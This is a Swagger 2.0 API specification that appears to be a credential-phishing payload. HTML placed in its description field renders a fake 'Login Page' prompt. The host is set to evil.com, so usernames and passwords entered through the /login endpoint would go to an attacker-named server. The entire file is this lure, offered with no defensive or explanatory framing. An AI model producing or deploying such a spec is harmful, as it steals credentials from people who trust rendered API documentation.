swagger: "2.0"
info:
  version: "1.0.0"
  title: "Login Page"
  description: |
    <div class="login-form">
      <h2 style="text-align:center;">Login Page</h2>
      <p style="text-align:center; color: #888;">Please enter your credentials to continue.</p>
    </div>
host: evil.com        
basePath: /api
schemes:
  - https

consumes:
  - application/x-www-form-urlencoded
produces:
  - application/json

paths:
  /login:
    post:
      tags:
        - Authentication
      summary: "Login with username and password"
      description: "Submit your credentials to receive a token."
      parameters:
        - name: username
          in: formData
          description: "Your login username"
          required: true
          type: string
        - name: password
          in: formData
          description: "Your login password"
          required: true
          type: string
      responses:
        "200":
          description: "Login successful"
          schema:
            type: object
            properties:
              token:
                type: string
                description: "JWT or session token"
        "400":
          description: "Invalid credentials"
        "500":
          description: "Server error"

definitions:
  LoginRequest:
    type: object
    required:
      - username
      - password
    properties:
      username:
        type: string
      password:
        type: string
